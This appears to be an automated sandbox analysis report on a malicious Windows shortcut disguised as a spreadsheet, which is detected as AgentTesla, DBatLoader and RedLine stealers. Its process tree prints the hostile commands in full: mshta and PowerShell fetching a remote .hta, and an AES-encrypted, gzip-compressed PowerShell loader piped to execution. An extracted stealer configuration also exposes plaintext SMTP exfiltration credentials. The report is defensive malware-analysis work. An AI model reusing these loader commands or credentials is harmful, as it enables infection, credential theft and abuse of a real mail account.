Edit tour
Windows
Analysis Report
FT. 40FE CNY .xlsx.lnk
Overview
General Information
Detection
AgentTesla, DBatLoader, PureLog Stealer, RedLine
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected AgentTesla
Yara detected DBatLoader
Yara detected PureLog Stealer
Yara detected RedLine Stealer
.NET source code contains method to dynamically call methods (often used by packers)
Allocates memory in foreign processes
Drops PE files with a suspicious file extension
Found URL in windows shortcut file (LNK)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Program Location with Network Connections
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows shortcut file (LNK) contains suspicious command line arguments
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Outbound SMTP Connections
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- powershell.exe (PID: 5632 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" .(gp -pa ' HKLM:\SOF* \Clas*\App lications\ msh*e').(' PSChildNam e')https:/ /www.sesso sesso.it/a ssets/aw/y t.hta MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 4204 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - mshta.exe (PID: 7260 cmdline:
"C:\Window s\system32 \mshta.exe " https:// www.sessos esso.it/as sets/aw/yt .hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - powershell.exe (PID: 7688 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop $Os FNkdw = 'A AAAAAAAAAA AAAAAAAAAA OeGa50V5wU O7zHydkcFZ bJINq4P3H3 RMsqOZX56v 9Ct1bZUtRZ kWxrChczJI NV9leAt1ry 1WLWkiFuSz fzQFE/yWmq aDZXsneytU PY+5le4m5e M4W+YWzERS nn/urcy8+Z TG58q1h/+B zdOb3w2O1z 7QWzthSNzG xOWWNyV7Tm YXZCKVR/W4 Wq5ilvQCut +dsc1oHeax o3nDd5I7/V ZnRBIlxsN6 HcNAACtlxf RiNFMSkDcN 8+7W2lqhnF d5fXX+lgvr RG0ld6mdkV 9WDBX6Qjfi DRmhCmcLWU j1Bf5MNMwF NO28V0dG8t S2l8mIOdvR 6aZF2v7aj+ 0KYrMlbdDh YWFi7OKVRA /3XZLlb5bb QDQE0oOT0J Ai3+7gTkWe sgJWCHgEue WTWqAMCB6A 7qRzrsbpay qU/WAl9/nK C9cB9JhUjr 2ITV9Ek3kE rAD+eAPojo Nd7bQuKjVE 9tLoDwyPKo 7YLWXTQF8w gZm0Ja3MfK MwkGLjtfBj T7ucygj4kL X/Zk01swB2 YhhmuTYGe5 8LHZYGFngy yCQTKG4k9t N5i5bStEsF ZehOTKeiva D+CKVo0hL0 r5uz5GQB2e w8dGCUwkPm eXZvkk4B1g aPU3SmBdkV frvuhGsjc5 t6HhSZTvvp 6Jz9v2fJj6 ahm37dhgqw qsOIhz9dfU sra5c/+Avs 0Ho38MGy4F jkP6OU6wM3 P9BykwtvTR UlAfl604Co txxEOc6gE6 TRnaarDiD6 zmwY1sYkKE tTlG2JS0b7 n2FWA1GsA= =';$JIfveZ K = 'cFRkU GZlWWl4R2Z Hdlp1WlRoc FlZR3RFVUt mamhETUc=' ;$UGIWRBAh = New-Obj ect 'Syste m.Security .Cryptogra phy.AesMan aged';$UGI WRBAh.Mode = [System .Security. Cryptograp hy.CipherM ode]::ECB; $UGIWRBAh. Padding = [System.Se curity.Cry ptography. PaddingMod e]::Zeros; $UGIWRBAh. BlockSize = 128;$UGI WRBAh.KeyS ize = 256; $UGIWRBAh. Key = [Sys tem.Conver t]::FromBa se64String ($JIfveZK) ;$VpSlE = [System.Co nvert]::Fr omBase64St ring($OsFN kdw);$uBmS tTPL = $Vp SlE[0..15] ;$UGIWRBAh .IV = $uBm StTPL;$cLY ZAvcnc = $ UGIWRBAh.C reateDecry ptor();$eV tPpVFwq = $cLYZAvcnc .Transform FinalBlock ($VpSlE, 1 6, $VpSlE. Length - 1 6);$UGIWRB Ah.Dispose ();$DaRjcu = New-Obj ect System .IO.Memory Stream( , $eVtPpVFwq );$wDjFzJ Y = New-Ob ject Syste m.IO.Memor yStream;$M tMSBjEhy = New-Objec t System.I O.Compress ion.GzipSt ream $DaRj cu, ([IO.C ompression .Compressi onMode]::D ecompress) ;$MtMSBjEh y.CopyTo( $wDjFzJY ) ;$MtMSBjEh y.Close(); $DaRjcu.Cl ose();[byt e[]] $dVtm fGSE = $wD jFzJY.ToAr ray();$ghW DGW = [Sys tem.Text.E ncoding]:: UTF8.GetSt ring($dVtm fGSE);$ghW DGW | powe rshell - MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7696 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7800 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" - MD5: 04029E121A0CFA5991749937DD22A1D9) - uc.exe (PID: 8080 cmdline:
"C:\Users\ user\AppDa ta\Roaming \uc.exe" MD5: E6AC6CA27AA2D60DC59A21AF1FFDB086) - cmd.exe (PID: 5360 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\Public\L ibraries\U cvuiswbO.b at" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3720 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - extrac32.exe (PID: 1460 cmdline:
C:\\Window s\\System3 2\\extrac3 2.exe /C / Y C:\Users \user\AppD ata\Roamin g\uc.exe C :\\Users\\ Public\\Li braries\\U cvuiswb.PI F MD5: 9472AAB6390E4F1431BAA912FCFF9707) - bwsiuvcU.pif (PID: 6340 cmdline:
C:\Users\P ublic\Libr aries\bwsi uvcU.pif MD5: C116D3604CEAFE7057D77FF27552C215)
- svchost.exe (PID: 7612 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- Ucvuiswb.PIF (PID: 1916 cmdline:
"C:\Users\ Public\Lib raries\Ucv uiswb.PIF" MD5: E6AC6CA27AA2D60DC59A21AF1FFDB086) - bwsiuvcU.pif (PID: 2196 cmdline:
C:\Users\P ublic\Libr aries\bwsi uvcU.pif MD5: C116D3604CEAFE7057D77FF27552C215)
- Ucvuiswb.PIF (PID: 2236 cmdline:
"C:\Users\ Public\Lib raries\Ucv uiswb.PIF" MD5: E6AC6CA27AA2D60DC59A21AF1FFDB086) - bwsiuvcU.pif (PID: 2324 cmdline:
C:\Users\P ublic\Libr aries\bwsi uvcU.pif MD5: C116D3604CEAFE7057D77FF27552C215)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Agent Tesla, AgentTesla | A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel. |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
DBatLoader | This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it. | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
RedLine Stealer | RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. | No Attribution |
{"Exfil Mode": "SMTP", "Host": "mail.irmaklarpaslanmaz.com.trB", "Username": "muhasebe@irmaklarpaslanmaz.com.tr", "Password": "MH5473588PmZ&"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
MALWARE_BAT_KoadicBAT | Koadic post-exploitation framework BAT payload | ditekSHen |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security | ||
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security | ||
Click to see the 61 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | ||
MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen |
| |
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | ||
Click to see the 72 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |